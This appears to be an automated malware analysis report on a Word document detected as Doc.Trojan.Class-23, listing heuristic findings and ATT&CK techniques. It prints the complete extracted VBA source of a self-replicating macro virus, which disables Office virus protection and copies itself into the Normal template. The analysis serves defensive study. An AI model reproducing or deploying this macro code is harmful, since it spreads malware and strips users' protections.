MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro markers and VBA macros, including AutoOpen and Auto_Close functions, indicating malicious intent. The AutoOpen macro attempts to export its code to 'c:\class.sys' and then re-inject it, a common technique for malware persistence or payload delivery. The ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Class-23 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-23
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
.replaceline 1, "Sub AutoClose()" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1739 bytes |
SHA-256: 4653fb24a85d21af340be430f84cf652b35c8c904064779d1fba13c009a63568 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-23
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error GoTo out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If Day(Now) = 31 Then MsgBox "•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•" + Chr$(13) + "• VicodinES /CB /TNN •" + Chr$(13) + "•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•-•", 0, "This Is Class"
If nt = 0 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
End If
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
If nt > 0 And ad > 0 Then GoTo out
host.codemodule.AddFromFile ("c:\class.sys")
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
End With
If nt = 0 Then
With host.codemodule
.replaceline 1, "Sub AutoClose()"
.replaceline 69, "Sub ToolsMacro()"
End With
End If
With host.codemodule
For x = 2 To 70 Step 2
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Now
Next x
End With
out:
If nt <> 0 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ViewVBCode()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.